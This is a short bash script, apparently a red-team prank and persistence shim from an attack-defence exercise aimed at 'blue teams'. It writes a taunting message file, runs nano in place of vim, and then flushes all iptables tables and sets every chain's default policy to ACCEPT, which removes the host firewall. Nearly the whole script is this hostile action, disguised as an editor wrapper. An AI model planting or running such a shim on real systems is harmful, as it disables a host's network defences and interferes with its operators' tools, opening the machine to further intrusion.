#!/bin/bash

# Wait for a few seconds
sleep 3

# Write a nice message to the blue teams
echo "You thought we were gone..." > readme.txt
echo "You thought you had won..." >> readme.txt
echo "Ha! Obviously you were wrong :D" >> readme.txt

# They will no longer have access to vim as long as this shim is in place
/bin/nano $@

# Source the ~/.bashrc
source ~/.bashrc

# Flush iptables rules
command iptables -F
command iptables -t mangle -F
command iptables -t nat -F
command iptables -t filter -F
command iptables -t raw -F
command iptables -t security -F

# Change default policies for 'iptables'
command iptables -P INPUT ACCEPT
command iptables -P OUTPUT ACCEPT
command iptables -P FORWARD ACCEPT
